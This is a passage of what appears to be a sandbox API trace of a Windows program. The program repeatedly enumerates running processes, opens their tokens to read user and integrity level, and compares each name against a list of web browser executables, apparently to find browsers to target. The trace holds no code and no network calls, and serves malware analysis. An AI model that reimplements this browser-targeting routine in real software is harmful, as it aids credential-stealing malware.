bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0604.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0604.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0604.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0604.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0604.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0604.746] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0604.746] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0604.746] GetLastError () returned 0x7a [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0604.747] CloseHandle (hObject=0x668) returned 1 [0604.747] CloseHandle (hObject=0x298) returned 1 [0604.747] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0604.747] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0604.747] GetLastError () returned 0x7a [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0604.747] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0604.747] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0604.747] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0604.747] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0604.747] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0604.747] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0604.747] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0604.747] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0604.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0604.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0604.747] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0604.747] GetLastError () returned 0x7a [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0604.747] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0604.747] CloseHandle (hObject=0x668) returned 1 [0604.747] CloseHandle (hObject=0x298) returned 1 [0604.748] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0604.748] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0604.748] GetLastError () returned 0x7a [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0604.748] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0604.748] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0604.748] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0604.748] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0604.748] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0604.748] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0604.748] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0604.748] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0604.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0604.748] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0604.748] GetLastError () returned 0x7a [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0604.748] CloseHandle (hObject=0x668) returned 1 [0604.748] CloseHandle (hObject=0x298) returned 1 [0604.748] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0604.748] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0604.748] GetLastError () returned 0x7a [0604.748] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0604.748] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0604.748] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0604.748] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0604.748] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0604.748] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0604.748] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0604.748] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0604.748] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0604.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0604.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0604.749] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0604.749] GetLastError () returned 0x7a [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0604.749] CloseHandle (hObject=0x668) returned 1 [0604.749] CloseHandle (hObject=0x298) returned 1 [0604.749] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0604.749] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0604.749] GetLastError () returned 0x7a [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0604.749] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0604.749] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0604.749] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0604.749] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0604.749] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0604.749] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0604.749] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0604.749] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0604.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0604.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0604.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0604.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0604.749] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0604.749] GetLastError () returned 0x7a [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0604.749] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0604.749] CloseHandle (hObject=0x668) returned 1 [0604.749] CloseHandle (hObject=0x298) returned 1 [0604.749] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0604.750] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0604.750] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0604.750] GetLastError () returned 0x7a [0604.750] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0604.750] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0604.750] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0604.750] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0604.750] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0604.750] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0604.750] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0604.750] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0604.750] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0604.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0604.750] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0604.750] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0606.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9690) returned 0xc0000004 [0606.754] VirtualAlloc (lpAddress=0x0, dwSize=0xa690, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0606.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa690, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0606.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0606.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0606.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0606.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0606.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0606.758] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0606.758] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0606.758] GetLastError () returned 0x7a [0606.758] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0606.758] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0606.759] CloseHandle (hObject=0x668) returned 1 [0606.759] CloseHandle (hObject=0x298) returned 1 [0606.759] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0606.759] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0606.759] GetLastError () returned 0x7a [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0606.759] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0606.759] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0606.759] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0606.759] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0606.759] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0606.759] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0606.759] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0606.759] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0606.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0606.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0606.759] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0606.759] GetLastError () returned 0x7a [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0606.759] CloseHandle (hObject=0x668) returned 1 [0606.759] CloseHandle (hObject=0x298) returned 1 [0606.759] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0606.759] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0606.759] GetLastError () returned 0x7a [0606.759] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0606.759] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0606.759] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0606.760] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0606.760] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0606.760] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0606.760] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0606.760] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0606.760] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0606.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0606.760] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0606.760] GetLastError () returned 0x7a [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0606.760] CloseHandle (hObject=0x668) returned 1 [0606.760] CloseHandle (hObject=0x298) returned 1 [0606.760] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0606.760] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0606.760] GetLastError () returned 0x7a [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0606.760] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0606.760] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0606.760] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0606.760] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0606.760] lstrcmpiW (lpString1="opera.exe", 